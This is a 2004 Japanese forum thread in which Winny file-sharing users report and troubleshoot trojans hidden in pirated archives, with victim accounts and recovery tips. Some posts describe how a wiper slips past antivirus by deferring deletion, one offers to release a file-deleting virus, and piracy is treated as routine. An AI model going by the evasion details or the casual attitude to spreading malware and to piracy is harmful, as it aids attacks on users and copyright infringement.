246 :[名無し]さん(bin+cue).rar:04/02/14 21:15 ID:GOb/bSuQ
2chブラウザのlogフォルダ。検索対象外にしとけ。

247 :[名無し]さん(bin+cue).rar:04/02/14 21:35 ID:eNvqyw1b
焦って削除依頼を出さないように、、、

248 :[名無し]さん(bin+cue).rar:04/02/14 21:43 ID:/AlvJiAC
>>247 もう遅い。出しちゃったよ。。。
そんで

http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/

「くらい読んでおけや、ボケ!」と叱られてきた。。。

249 :[名無し]さん(bin+cue).rar:04/02/14 22:05 ID:KBx5WVDs
おれも放課後で全消しされたー!
あとこのスレ来たらノートンが反応したぞ

250 :[名無し]さん(bin+cue).rar:04/02/14 22:51 ID:588AmCYc
ノートン無反応なんだが・・
更新してみたが無反応
定期購読期限も2172/09/14で無問題


なぜ?

251 :[名無し]さん(bin+cue).rar:04/02/14 23:32 ID:vg+pJXUT
これなんかは、どうかね?

MP3はLAMEでエンコしてくれ Ver10
http://tmp2.2ch.net/test/read.cgi/download/1072238741/634

252 :[名無し]さん(bin+cue).rar:04/02/14 23:49 ID:FF/FTIVA
>>250
2172って
あーた。

253 :[名無し]さん(bin+cue).rar:04/02/14 23:53 ID:6NW622GS
ハードディスク消されるってシステムドライブ(C)だけ?
それとも、それ以外のもやられるの?


254 :[名無し]さん(bin+cue).rar:04/02/15 00:34 ID:5kjfXFRK
>>239
ソレダ。

255 :[名無し]さん(bin+cue).rar:04/02/15 00:43 ID:8uhaZa6B
漏れも放課後でやられた。
ルート以外全部消去。
ルートも一部消えてて、復旧不可能だったので再いんすこ。
今日一日はそれで終わった。マジ泣きそう。


256 :[名無し]さん(bin+cue).rar:04/02/15 00:51 ID:7yuQ0hUO
放課後に入ってるのは、フォーマットソフトか?
ウイルスではないような気がするのだが。

257 :[名無し]さん(bin+cue).rar:04/02/15 00:55 ID:yZZwVe+B
nyやるならAntidote必須

258 :[名無し]さん(bin+cue).rar:04/02/15 03:28 ID:+nCrcZgs
最近皆さんが騒いでるウィルスとやらのせい
でネット接続不能になりますた。だからケータイからカキコしてまつ。
再インストールもんだね、このダメージは(泣)

259 :[名無し]さん(bin+cue).rar:04/02/15 10:56 ID:xU3uAWYm
Cドライブを定期的に丸ごとバックアップしてるから何があっても平気
このため用にHDを一つ買うくらいなんてことないでしょ

260 :[名無し]さん(bin+cue).rar:04/02/15 13:35 ID:fWlLy3lQ
XPはCドラまるごとバックアップは無理

261 :[名無し]さん(bin+cue).rar:04/02/15 13:46 ID:TBvfMdW5
感染しても何もせずPC再起動したときに
ログイン画面の直前に起動してファイル削除してまわる
ウィルス作ったけど流して欲しい?

262 :[名無し]さん(bin+cue).rar:04/02/15 14:46 ID:4p5C/B3R
>>203のタイプは誰かが人柱にならないとわかんないなマジで、パパン助けて


263 :[名無し]さん(bin+cue).rar:04/02/15 15:03 ID:w2YhIrS3
ほんとか?だったらうpしろよ
おれが実験台になる

264 :195:04/02/15 15:07 ID:YyrLIUL9
>>195
(アプリ)ATOK17(ccd+rr3%)シリアル付.rar 53,080,912 333701088078b262a6e35d82082feb91
これを踏んでしまってHDからファイルが消えてしまったのですが、これって物理フォーマットされてるんでしょうか?
ファイナルデータで復旧可能でしょうか?

ATOKに目がくらんで踏んでしまったこのアプリ…
カリカリカリカリいい音を立ててファイルが消えていってしまった。
後には何も残さずに。。。

ファイナルデータでも書き換えられたファイルは絶対復元できない。
わずかに被害を免れたファイルだけは戻ってきた。
それでよしとしなくてはならないのか…
嗚呼!

一難さってまた一難!!
悪夢のATOKから5日して、再び消去ソフトが始動!
今度は外付けのHDまですっかりやられました。
OS再インストールしたんだけど、これでもう大丈夫なのか??
こわくてパソコン起動できません。。。

265 :[名無し]さん(bin+cue).rar:04/02/15 15:19 ID:8QJH9cAT
>>264
もう失うものは無いのだから怖がる必要はないだろう。

266 :[名無し]さん(bin+cue).rar:04/02/15 15:33 ID:Lfov5fm/
バンドスコア共有推進委員会ってなんだ?
明らかに怪しい。txr.urlって騙してるのか?そういうもんなのか?

267 :[名無し]さん(bin+cue).rar:04/02/15 15:38 ID:xU3uAWYm
XPでもできるって、現にやってるし、たまには他の板も見なさいよ
http://pc2.2ch.net/test/read.cgi/software/1065017146/

俺が使ってるのはこれ、定期的にHDを入れ替えてる
何が起こってもへっちゃらさ!
ttp://www.bha.co.jp/products/rakuda.html

268 :[名無し]さん(bin+cue).rar:04/02/15 15:44 ID:kpoFDr9z
>>264
こいつは馬鹿だな

269 :[名無し]さん(bin+cue).rar:04/02/15 17:47 ID:AffDf4Dp
アンティ二ー作った奴出て来い!!!
糞がーーーーー!!!!!

270 :264:04/02/15 17:57 ID:YyrLIUL9
馬鹿といわれてもいい。
もうこれで大丈夫なんでしょうか!?
わたくしのやるべきことは!!

271 :[名無し]さん(bin+cue).rar:04/02/15 17:59 ID:sgmGCTzq
>>266
その名の通り、バンドスコアを流してるだけ

クラスタワード総合スレ3
http://tmp2.2ch.net/test/read.cgi/download/1076636677/

272 :初心者:04/02/15 18:05 ID:jvaVpuH3
すいません winny クラックパッチ.exeというファイルを実行してからだと
思うのですがほとんどのファイルが消されてしまいました。
フォルダだけが残っています。
finaldataというソフトをつかって復元を試みたのですがすべて33kビットに
なっており、システム情報でサイズを大きくしてもうまく復元できません。
どうすればいいでしょうか だれか
おしえてください 本当に お願いします。

273 :[名無し]さん(bin+cue).rar:04/02/15 18:09 ID:QX+yZVrr
諦める。
このフォーマットネタは三年前からあるんだし。
用心してない自身の責任

274 :[名無し]さん(bin+cue).rar:04/02/15 18:15 ID:NquUNd2U
>>272
つまらんネタだな・・・

275 :初心者:04/02/15 18:29 ID:jvaVpuH3
そんなにむかしからあるのですか?
ノートンを入れていたのに何もできませんでしたが?
>>274さんねたじゃないです。
みなさんはどうやって対策しているのですか?
これはOSを入れなおさないともうだめってことでしょうか

276 :[名無し]さん(bin+cue).rar:04/02/15 18:31 ID:sgmGCTzq
>>275
クラック厨は無視

277 :[名無し]さん(bin+cue).rar:04/02/15 18:39 ID:0TFCo874
>275
対策を教えてやる。

exeは実行しない。



278 :[名無し]さん(bin+cue).rar:04/02/15 18:49 ID:hxV44Cxi
winny クラックパッチ.exe

クラックしようとしたくせに人に訊くのか

279 :[名無し]さん(bin+cue).rar:04/02/15 19:02 ID:jvaVpuH3
ポートが0でしかできないのを解除できるものなのかなーって
やったのです。すいません
これって>>195産と一緒の状態ですね
もうむりなんですか・・
これからはパテーション分けたりもしたいので
全部消して位置から出直すしかないのかな・・・・・
はぁ 明日月曜日なのになんか悲惨な週末になってしまいました
1年半のデータが0かぁ あああああああ
どしようどうしよ みんなこういうときどうやってるの
泣き寝入りしかない? 

280 :[名無し]さん(bin+cue).rar:04/02/15 19:05 ID:NquUNd2U
>>279
しつこいよお前・・・

281 :[名無し]さん(bin+cue).rar:04/02/15 19:18 ID:sgmGCTzq
一年半も割れやって初心者を名乗るとは、とことん汚い奴だな


282 :[名無し]さん(bin+cue).rar:04/02/15 19:21 ID:GMeKHoc3
HDD全消しのウイルスはパーティション作っても、意味ないよ。
あやしいファイルは開けないで、
ウイルス防止のソフト入れておくのが妥当なんじゃない?
失ったデータは残念だけど・・・

関連スレ
HDぜんぶ消去した上ズタズタに!!ウィルス
http://ton.2ch.net/test/read.cgi/sec/1001662997/
http://ton.2ch.net/sec/kako/1001/10016/1001662997.html

283 :195:04/02/15 19:35 ID:L4vP72Uh
>>279
あなたは私の友です。
でもデータは元には戻りませんから,本当に泣き寝入りです。
Winnyで落とした動画はまたやり直しがききそうですが,デジカメの写真など
プライベートなデータはすべてパアになりました。
1度目の被害の後,ファイナルデータを起動させたときは,写真300枚余が
救われたのですが(他にZIPファイルが数10),今回の2回目ですべてが終わりましたね。
火事で家が全焼した人の気持ちがよく分かりました。でも,嗚呼嗚呼…

284 :[名無し]さん(bin+cue).rar:04/02/15 20:11 ID:0WADT/0D
くどいっつーの
低脳ぶりを晒すのはいいかげんにしろ

285 :[名無し]さん(bin+cue).rar:04/02/15 21:00 ID:pAVkmAPN
>>275
ウィルスじゃなくて、単なる「悪意のあるソフト」なんだから、ノートン他ウィルス対策ソフトが
反応しなくても当たり前。

実行する人間がバカ。

286 :[名無し]さん(bin+cue).rar:04/02/15 21:13 ID:wrmVI1Oa
>>283
>火事で家が全焼した人の気持ちがよく分かりました

マジレスで申し訳ないがつい最近近所の家が全焼した
そのうちの家族はみんな働きに出ていて帰ってきたときは家が最高に燃えてるときだった
みんな放心状態だったよ、HDD全データ消滅なんて屁みてえなもんじゃねえか



287 :[名無し]さん(bin+cue).rar:04/02/15 21:22 ID:Y6JcH23W
うああああ!!
anntinyにかかってしまった

_ト ̄|○

レジストリの削除やらはしたけど
スキャンすると
c:\_restore\temp\A038〜
てファイル2個が感染したままになってて
しかも消せないけど問題ないのか?

288 :[名無し]さん(bin+cue).rar:04/02/15 21:25 ID:NJQGiWVx
問題ないよ

289 :[名無し]さん(bin+cue).rar:04/02/15 21:26 ID:Y6JcH23W
そうか、、、問題ないのか
でもすげーきになるんだが
どうやっても消せないの?

290 :[名無し]さん(bin+cue).rar:04/02/15 21:39 ID:OqVIbiaT
>287

復元ポイントの情報にあるから削除汁
ttp://www.itmedia.co.jp/help/tips/windows/w0399.html
ttp://www.itmedia.co.jp/help/tips/windows/w0537.html

291 :[名無し]さん(bin+cue).rar:04/02/15 22:00 ID:l4hjJvl3
おまえらサンクスコ!!

292 :[名無し]さん(bin+cue).rar:04/02/15 22:02 ID:l4hjJvl3
再起動したからID変わってたな
>289,291=287だ

293 :195:04/02/15 22:05 ID:wZHo1LL2
>>286
屁よりは上だろ,氏ね。

294 :[名無し]さん(bin+cue).rar:04/02/15 22:26 ID:mO0MpG9x
>>293
おまえが氏ね。
つか、いい加減ウザイ

295 :[名無し]さん(bin+cue).rar:04/02/15 23:10 ID:sBfMTl99
>>293
いちいちageるなカス野郎
さっさと消えろよ

296 :[名無し]さん(bin+cue).rar:04/02/15 23:18 ID:6fELYnBP
>>293
おまえは屁より下だがな

297 :[名無し]さん(bin+cue).rar:04/02/15 23:36 ID:VdkJyhSW
しつこいな。
どこまで粘着なんだか。

298 :[名無し]さん(bin+cue).rar:04/02/15 23:37 ID:CIiNTFN8

            ノ ‐─┬       /
          ,イ  囗. |      / _ 丿丿
            |    __|    ―ナ′
                     /  ‐' ̄
              ,‐       /
            ナ' ̄       /   、___
     /      ノ`‐、_
    / _ 丿丿  _メ       | _/
  ―ナ′     〈__         X / ̄\
   /  ‐' ̄               / V   /
   /       \   l       レ ' `‐ ノ
  /   、___  Χ ̄ ̄〉
             \ 丿       /
              \          / _
                    ―ナ′__
     | _/       ̄ ̄〉     /   ,
    X / ̄\       ノ     /  _|
   / V   /             /  く_/`ヽ
   レ ' `‐ ノ  ―――'フ
              / ̄      ┼┐┬┐
               |          〈 /  V
              `−      乂   人

             ┼‐      |  ―┼‐
             ┼‐       |    |
             {__)      |   _|
                        |  く_/`ヽ


299 :[名無し]さん(bin+cue).rar:04/02/15 23:41 ID:Tr/F7Y3y
>>198はこのスレで慰めて欲しかったんだろうな(藁

300 :[名無し]さん(bin+cue).rar:04/02/15 23:41 ID:Tr/F7Y3y
>>195

301 :[名無し]さん(bin+cue).rar:04/02/16 00:01 ID:80bi6zU/
>>195は自業自得
屁だと思ったらウンチだった
っていう事例よりもずっと下。

302 :[名無し]さん(bin+cue).rar:04/02/16 01:30 ID:jpvyFlRy
>>1のwhiter対策さあ、whiter.exeのファイル作るんじゃなくて、
ディレクトリを作るんじゃないの?

303 :[名無し]さん(bin+cue).rar:04/02/16 02:37 ID:3ktd19Mk
なにげに親切なやつ多いな、ココ
犯罪者だけどw

304 :[名無し]さん(bin+cue).rar:04/02/16 05:50 ID:cASvZEFw
ウイルスバスター様がデルオール発見してくれましたよ。
助かった。。。。ほんと。。

305 :[名無し]さん(bin+cue).rar:04/02/16 07:53 ID:XdTsrRrV
また真性こうりーん?

306 :[名無し]さん(bin+cue).rar:04/02/16 11:08 ID:71vbBnTJ
ここの人ってインスコしたあとレジストリチェックしないの?

307 :名無し]さん(bin+cue).rar :04/02/16 15:25 ID:N7JB41O8
>>232
ソレダ。

308 :[名無し]さん(bin+cue).rar:04/02/16 18:22 ID:qi0jKJe/
自分も>>79と同じやつ喰らって、
レジストも復元も使えなくなった。
俺も、たぶんZONEの新曲のやつから感染したと思われ。
俺、ノートン入れてて、駆除してたはずなのに。。。
気がついた時はノートンがオフにされてて、
感染してるのにスキャンしても反応もなかったよ。


309 :[名無し]さん(bin+cue).rar:04/02/16 18:51 ID:IKlQ/sJj
突然ですがこのスレのおかげで助かりました。サンクス!

310 :[名無し]さん(bin+cue).rar:04/02/16 19:10 ID:1NzDOohk
ただ今、ゥィルス感染中ダッ!!
おそらく>>79と同じやつ、レジストリが使えなくなった。
モー娘。の新曲のやつから感染したと思われ。
破損もしくは捏造ファイルと思い放置していたが、
AVGは感染ファイルに Hidden extension の警告を出すようだ。
Windows起動すると、”MSIME2002”というプログラムが立ち上がる。
そのプロセスを調べるとC:\WINDOWS\system32フォルダの rpcss.exe のようだ。
rpcss.exe単体で起動すると、WMP9が立ち上がり、
システムのプロパティ の 使用者が
” Winnyで違法ファイル集めてます(^^)v ” となる。

未確認だがWinnyのCashe量が1/5くらいになっている?

311 :[名無し]さん(bin+cue).rar:04/02/16 19:17 ID:VOpEPqHb
なんかウイルスばらまいてる人も考えるよね。
いかにも厨が食いつきそうなネタにしか同梱されてないようだし。

312 :[名無し]さん(bin+cue).rar:04/02/16 19:41 ID:P0gKVSyz
>>308
79です。
OS再インストしなくて、復元できる方法無いでしょうか。
このウイルスは放置して繋げてると逮捕される危険もあるみたい。
駆除してもウイルスには感染しちまうでしょ。
どうしたらいいんだろ、このウイルス。
レジストも復元もオフになってるので、どうしていいのか分からないから、
再インストが一番手っ取り早いでしょう
>>310
早めにHDDを初期化した方がいいかもね

本物・安全ファイルは、>>217 を参照するといいかも。


313 :[名無し]さん(bin+cue).rar:04/02/16 19:44 ID:O5bkfR+C
アーカイブ内に忍び込ませてあるやつがやたら多いな。

314 :[名無し]さん(bin+cue).rar:04/02/16 19:45 ID:oTgLlNiT
面白半分で流したのにこんなに引っかかる人がいるとは。。

315 :[名無し]さん(bin+cue).rar:04/02/16 20:02 ID:OPySOlvE
サクシャキタ━━━━━━(゚∀゚)━━━━━━ ?

316 :[名無し]さん(bin+cue).rar:04/02/16 20:29 ID:Uqj1S3Rx
DLLが無いと起動できない、ヘッポコウィルスのヘタレ作者w
あれからお勉強して、少しはマトモなものになったのか?

317 :[名無し]さん(bin+cue).rar:04/02/16 22:08 ID:DysunTZW
>>314( ・∀)人(∀・ )通報しますた!

318 :[名無し]さん(bin+cue).rar:04/02/16 22:51 ID:fiDdwme4
>>7
いいかげん lzh全部を無視リストに入れてもいいんじゃないのか?

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.lzh,,0,0,,0,1,0

これじゃだめか?

319 :318 98SE :04/02/16 23:02 ID:fiDdwme4
あと、今流行ってるっぽいウイルスかかった人は
どのOSで感染するか判断するために
じぶんのPCのOS表記したほうがいいんじゃないのか?

今流行ってるウイルスって
結局exeファイルを起動したからってオチなんですよね?



320 :16=317:04/02/16 23:13 ID:DysunTZW
>>319 そうですね
自分はw2kでやられました・・・

321 :[名無し]さん(bin+cue).rar:04/02/16 23:17 ID:Rnap7xFP
>>314
本当に作者であれば、ソース流していただけませんか。

>mp3偽装型ウイルスの被害者へ
regファイルは、レジストリエディタが使えないと、ダブルクリックしても意味ないのでしょうか。
もし、有効ならこれをメモ帳にコピーして、拡張子をregにしてダブルクリックすればいいかもしれません。

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

もしくは、使ったことないですが、他のレジストリ編集ツールがあります。
http://www012.upp.so-net.ne.jp/two_clicks/fs_tool.htm#03


322 :[名無し]さん(bin+cue).rar:04/02/16 23:53 ID:DysunTZW
>>321
あんたは偉い

でも誰が試すんだろうな・・・

323 :[名無し]さん(bin+cue).rar:04/02/17 02:18 ID:yQbBSfd6
_incomplete_[ドラマ] 白い巨塔 第15話「判決」.avi
これなんでインコンプリートなのかよくわかんないんだけど、
削除できなくて困ってます。
これってウイルス?

324 :321:04/02/17 02:18 ID:6jqOIXkO
>>321
regファイルは、レジストリエディタが使えないと、ダブルクリックしても意味ありませんでした。
窓の手でレジストリエディタを使えるようにしてもいいかと。

325 :[名無し]さん(bin+cue).rar:04/02/17 02:22 ID:I7bwjCvu
>>323 再生中とか、変換中だったとか
再起動してだめだったらDOSかなんかで削除しる

326 :[名無し]さん(bin+cue).rar:04/02/17 02:22 ID:6jqOIXkO
>>323
ウイルスではありません。
そのファイル名でテキストファイルを作って上書きすればよろしい。

327 :[名無し]さん(bin+cue).rar:04/02/17 06:03 ID:t503R43Y
拡張子も見えないのかおまえらは

328 :[名無し]さん(bin+cue).rar:04/02/17 06:12 ID:yaTwzoys
>>327
盲目の香具師らに対して失礼なこと言うなや。
藻前には、人をいたわる心がないのか?

329 :[名無し]さん(bin+cue).rar:04/02/17 06:14 ID:TXIaHEYM
見るんじゃない、感じるんだ!

330 :[名無し]さん(bin+cue).rar:04/02/17 09:25 ID:SVo7f1+W
>>79
の中にあるmp3調べてみたけど、泉谷しげるの曲を3曲zipでかためてmp3に偽装しただけだったよ。

331 :[名無し]さん(bin+cue).rar:04/02/17 11:29 ID:CuKk9lo3
>>239のやつ昨日やられたので報告しときます。

起動したらaz.exe?か何かのプロセスが起動して、全ドライブのファイルを消去する。
(途中で止めたので全部じゃないかもしれんが)
ノートン先生でAuto-Protect有効・パターン最新で検出されず。

最初の活動ではファイルをごみ箱に移して、自身をレジストリのRunに追加するだけっぽい。
で、再起動後にごみ箱が空になる、と。
こういう手順踏んでるからウィルスとして検出されないのか?とか思った。
あと消えたファイルは「復元」で復旧できた。

以上おしまい。

332 :[名無し]さん(bin+cue).rar:04/02/17 15:32 ID:vH5V27rX
Winnyを起動している時に限り作動するワームってあったりするかな?

なんか最近Winnyを使ってると、うちのPCからとあるIPアドレス(いつも同じ)の
ポート1433へのアクセスをノートン先生が止めてくれるんだけど…
ちょうどslammerとかspidaの症状みたいな感じなんだけど、それらに感染する
様な環境ではないし、Winnyを起動していないときは全く発生しないんだよね。
なんなんだろこれ。


333 :[名無し]さん(bin+cue).rar:04/02/17 15:49 ID:Ip3GctM4
「Norton」で検出されないという事は
Freeの「AVG」や「ウィルスバスター オンラインスキャン」でもだめなのだろうか。
>331 消されたファイルは「Norton」の「復元」でほぼ完全に復旧できたって事?

やっぱ「Norton」買わないといかんなぁ。

334 :[名無し]さん(bin+cue).rar:04/02/17 16:49 ID:9GF7n68b
だめだ、お前はなにもわかってない!

335 :[名無し]さん(bin+cue).rar:04/02/17 16:50 ID:0ImTSlLT
ファイルをゴミ箱に移動して、再起動時にゴミ箱をカラにするだけ
ウィルス認定されないわな

336 :[名無し]さん(bin+cue).rar:04/02/17 16:58 ID:Ip3GctM4
>335 なるほど、ありがとう。
この手の危ないファイルを検知してくれるソフトウェアってあるの?

337 :[名無し]さん(bin+cue).rar:04/02/17 18:42 ID:VTBTIEUs
>>331
そのaz.exeはゲーム本体の実行ファイルでもあるから余計にタチが悪かったり。
あと、放課後〜に関してだけだけど、ウイルス入りは404K、普通のは396Kだから
そこで見分けられたりする。俺が見付けた奴だけだけど。

338 :[名無し]さん(bin+cue).rar:04/02/17 20:34 ID:NRBb9JkV
>>336
お客さんその類はウィルスじゃないんですよ
ノートン他が検知しないのは当たり前なんですな
仕込まれてるのはウィルスだけじゃありませぬ
exeファイルの実行はあくまで自己責任ということで

339 :[名無し]さん(bin+cue).rar:04/02/17 21:32 ID:bIiC4l9n
>>338 いや、立派なウィルスだよ。
以下 ttp://www.ipa.go.jp/security/antivirus/kijun952.html より抜粋。

----------------

コンピュータウイルス対策基準
コンピュータウイルス対策基準を次のように定め、平成 7年 7月 1日から施行する。
なお、平成 2年 通商産業省 告示 第 139 号は、平成 7年 6月30日限り、廃止する。
1. 主旨
本基準は、コンピュータウイルスに対する予防、発見、駆除、復旧等について実効性の高い対策をとりまとめたものである。
2. 用語の定義
 本基準に用いられる主な用語の定義は、以下のとおりである。
(1) コンピュータウイルス(以下「ウイルス」とする。)
第三者のプログラムやデータべースに対して意図的に何らかの被害を及ぼすように作られたプログラムであり、 次の機能を一つ以上有するもの。
 1)自己伝染機能
自らの機能によって他のプログラムに自らをコピーし又はシステム機能を利用して自らを他のシステムにコピーすることにより、 他のシステムに伝染する機能
 2)潜伏機能
発病するための特定時刻、一定時間、処理回数等の条件を記憶させて、発病するまで症状を出さない機能
 3)発病機能
プログラム、データ等のファイルの破壊を行ったり、設計者の意図しない動作をする等の機能


340 :[名無し]さん(bin+cue).rar:04/02/17 22:20 ID:NRBb9JkV
>>339
定義はそうだけどさ、感染型でなきゃ検知は無理だっしょ
HDDフォーマットする類のやつなんか大昔から有るし

341 :[名無し]さん(bin+cue).rar:04/02/17 22:29 ID:mFgvN7lQ
放課後は消されるけど、復元等の復旧ソフトでかなり救えるな。
9割方もどったので助かったよ。

342 :[名無し]さん(bin+cue).rar:04/02/18 08:55 ID:7E+GmZ0O
>>330
79だけど、俺何開いたらウイルス警告が出たんだろ。
多分、MP3の偽装>>321 参照 これに引っかかったんだろうか。
でも確かそいつはZONEの新曲に間違いない

343 :[名無し]さん(bin+cue).rar:04/02/18 11:35 ID:/V0WOcts
ちょっとお聞きしたいのですが、antinnyって何種類かあるんですか?

344 :[名無し]さん(bin+cue).rar:04/02/18 17:13 ID:m2B1MbMP
>>343
実は一種類かもしれないぞ。

345 :[名無し]さん(bin+cue).rar:04/02/18 17:45 ID:0JMrZePX
>>343
4種類ぐらいじゃないの?

346 :[名無し]さん(bin+cue).rar:04/02/18 20:48 ID:yCI6k+2U
外付けDVD-Rを接続するとフリーズするようになりました。
ウィルスがこういう原因になることってあるんでしょうか?

347 :[名無し]さん(bin+cue).rar:04/02/18 21:26 ID:PPaWye/p
>>346
何でもウィルスのせいにするな。
もっとよく調べてから書き込め。

348 :[名無し]さん(bin+cue).rar:04/02/18 21:33 ID:oXuVPrZ3
>>346
アフォか!
普通まずウィルスより故障を疑うだろ

349 :[名無し]さん(bin+cue).rar:04/02/18 21:35 ID:/NMZ4vjA
少し質問させていただきますが
.aviファイルを実行したらCPUの稼働率が
100%になってしまいました。なんかやばいと思ったので
消去しようとしたのですが、「消去できません。他のコンピュータが使用しています〜」
という旨のメッセージが出て消去できません。
少しでも助言をいただければ幸いです。

350 :[名無し]さん(bin+cue).rar:04/02/18 21:36 ID:HlpqvY9p
>349
XPだから


351 :[名無し]さん(bin+cue).rar:04/02/18 21:39 ID:GSLQgR7q
 http://internet.watch.impress.co.jp/cda/news/2004/02/17/2117.html

ネットエージェントは17日、ファイル交換ソフト「Winny」の通信を特定し、ブロックできるソフトウェア「One Point Wall Winny」を2月27日に発売すると発表した。価格は98,000円/100デバイス。

 One Point Wallは、通常のファイアウォールの内側などにブリッジとして設置することが可能なファイアウォール。1製品につき、1つのコンテンツに絞ってブロックする点が特徴だ。

 ブリッジとして動作するため、IPアドレスを設定しないで運用することもできる。また、起動CDのみで動作するため、ハードディスクへのインストールが不要で、ログを保存したい場合にはUSBメモリなどに書き込める。

 One Point Wall Winnyでは、ファイル交換ソフト「Winny」の暗号を解読し、Winny特有の通信パターンを特定した上でWinnyの通信かどうかを判断し、ブロックしているという。従来より、Winnyは通信は全てが暗号化されている上、
ポート番号なども任意に設定できることから、通信の特定は難しいとされてきた。

 具体的には、ノードから出された“Winnyと思われるパケット”の暗号を解読し、Winnyであるかどうか評価する。評価でWinnyであると判断された場合には、パケットを破棄する。暗号を解読しているため、評価の信頼度は高いという。
また、ノードのIPアドレスやどのようなキーワードで検索しているのか、なども検知可能でそれらのログを保存することもできる。

352 :[名無し]さん(bin+cue).rar:04/02/18 21:40 ID:oXuVPrZ3
>>349
おまいもアフォか!
明らかにウィルスじゃねーよここのテンプレ嫁
http://tmp2.2ch.net/test/read.cgi/download/1076632175/

353 :[名無し]さん(bin+cue).rar:04/02/18 21:47 ID:NQFtnNjr
最近の奴は、不具合がおきたらなんでもウィルスと思うのか・・・
まず己のスキルを疑え!ウィルスはその後だ。

354 :[名無し]さん(bin+cue).rar:04/02/18 22:51 ID:Fa+vqGpR
ていうかまず最初に自分がしていることは犯罪だということを自覚しれ
自覚したら書き込む前に自分で調べれ
掲示板に書き込みをしたら捕まる可能性もあることを自覚すれ

355 :323:04/02/18 23:31 ID:cb8HrfvD
<<326
ありがと。
実はあの後タスクマネージャでExplorer.EXEを強制終了してから
削除したら消えちゃった。
となると、デスクトップかなんかに
_incomplete_[ドラマ] 白い巨塔 第15話「判決」.txt
ってファイルを作るとファイル使用中じゃあなくなるってことなのかな?


356 :[名無し]さん(bin+cue).rar:04/02/18 23:46 ID:ETA1p0D3
AVG使うと必ずフリーズする

357 :[名無し]さん(bin+cue).rar:04/02/18 23:47 ID:oXuVPrZ3
>>355
おまいも>>352のテンプレ嫁

358 :[名無し]さん(bin+cue).rar:04/02/18 23:49 ID:xJQUUIyy
antinnyを拾ってきたので、少し気になってた事を
隔離PCに感染させて実験してみた。
(Win98se Winny2ver7.0) (win2000 Winny2ver7.1)

\Winny2\Cache の他に \Winny2\本当のCache を作り
こちらをWinnyのキャッシュフォルダに設定する。
1)両方に同じキャッシュファイルを、数個放り込みantinnyを起動

 \Winny2\Cache →キャッシュ消える
 \Winny2\本当のCache →キャッシュは消えず変換も問題なかった。

2)\Winny2\Cache を空にしてantinnyを起動
3)\Winny2\Cache を削除してantinnyを起動

 \Winny2\本当のCache →上と同じ

全てのantinnyに当てはまるかどうかわからないけど
このWINNY.iniを読まないタイプならフォルダの設定かえるだけで
キャッシュ消失という事態だけは避けられるんじゃないだろうか。
過去にantinnyに感染してもキャッシュ消えなかったという人がいたが
キャッシュフォルダの設定変えてたんじゃないかと推測するけど、どう?

(本物+ぬるぽ同梱タイプ)
(写真集) 岩佐真悠子 - 「魅力=∞」 (マガジン グラビアNet) (30pics).zip
54d9ac0fcd0dfbe45303b1759a31c3ac

359 :323 355:04/02/19 01:04 ID:lml8Fb/b
>>357
失礼、読んで理解した。

360 :[名無し]さん(bin+cue).rar:04/02/19 01:21 ID:Dve7B+Bs
>>358
実験乙
オチャドーゾ( ・∀・)⊃旦

361 :[名無し]さん(bin+cue).rar:04/02/19 01:58 ID:f29DZrP3
MS Blast.A うぜeeeeeeeeeeeeeeeeeeeeeeeeeeee

あ、再起動 キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

だめぽ

362 :[名無し]さん(bin+cue).rar:04/02/19 02:01 ID:CtztUXUt
ネタ?
げいいん(←なぜか変換できない)分かってれば対処できるだろ

363 :[名無し]さん(bin+cue).rar:04/02/19 02:05 ID:yHqkSUlq
>>362
げいいん?ばーか、小学校で習わなかったのか?
原因だよげんいん( ´,_ゝ`)プッ








(・∀・)吊られちゃった

364 :[名無し]さん(bin+cue).rar:04/02/19 02:09 ID:f29DZrP3
まぁ、大体原因はわかってきたが、常に再起動されるので
調べるのも一苦労だよ(苦笑

こんなの、素人には対処できないと思われ。。。

365 :[名無し]さん(bin+cue).rar:04/02/19 02:36 ID:ZL5cNMkn
何もしていないのに、突然パソコンの画面が青くなり、その後すぐ再起動してしまいます。
ノートンいれていたんだけど、NYはOFFになっていた。

そして、HDの共有をみてみたら、知らない間に共有に成っていた。
これってウイルス?


366 :[名無し]さん(bin+cue).rar:04/02/19 02:53 ID:3d0cGHPz
>>365

SPY

367 :[名無し]さん(bin+cue).rar:04/02/19 02:54 ID:re9UtFc8
もうちっと 落ち着いて 

368 :[名無し]さん(bin+cue).rar:04/02/19 04:22 ID:USm0LKEb
>>358
前に本物+antinnyを拾って勢いあまって
実行しちゃったときに、キャッシュ消えなかった。
すぐに殺したんでキャッシュ消すまで実行されたかわからないが、
 D:\Winny\Cache
 D:\Winny2\Cache
というフォルダ構成のおかげで実際に使ってた
ny2のキャッシュは消されなかったのかなと思った。

369 :[名無し]さん(bin+cue).rar:04/02/19 06:32 ID:CHOZN4nv
PE-PARITE.aをウイルススキャンで見つけたんだけど、これが入ってるファイルの拡張子がavi.lzhなのよ。ファイル名は
『(お笑い)完売地下劇場 劇団ひとり ゲチンコファイトクラブ 2002年12月07日.avi.lzh』だからlzhを消せば見れると思うんだけど、
これ見たら感染するのかな?実行してないし、捨てるのが一番安全なのはわかるけど、知ってる人いたら教えて

370 :[名無し]さん(bin+cue).rar:04/02/19 06:45 ID:u+VbDDf6
なんつ〜か、そのぉ…
いい言葉が見つからん
↓かわりに言ってやってくれ

371 :[名無し]さん(bin+cue).rar:04/02/19 07:07 ID:4mmxrO/g
>369
PARITEは実行ファイルにしか感染しないから、中のaviは大丈夫かも。

372 :[名無し]さん(bin+cue).rar:04/02/19 08:10 ID:B6+OpLWc
>>363のアフォさに誰も突っ込まないのにワロタ

373 :369:04/02/19 08:31 ID:CHOZN4nv
>370、>371レスありがとう!!!
一応拡張子をaviにしてウイルススキャンかけたけどやっぱりひっかかっちゃう〜。劇団ひとりはあきらめるよ
(´Д`;)でもavi.lzhとかzip.mp3とかのファイルって最近多くない!?だいたい後ろのをはずせばちゃんとなるけど、
そういうファイルが感染してて、そのファイルの拡張子を変更しただけじゃ、やっぱりantinnyとか私の場合のPE_PARITE.Aとかを防げないのかな〜?
名前変えても再生すると感染するもんなんか〜?

374 :アホばっか:04/02/19 08:40 ID:gKiqjp7D
>>373
>>7 をした後
avi.lzhとかzip.mp3はその元であるaviとかzipがあるはずだからそれを落としなさい。

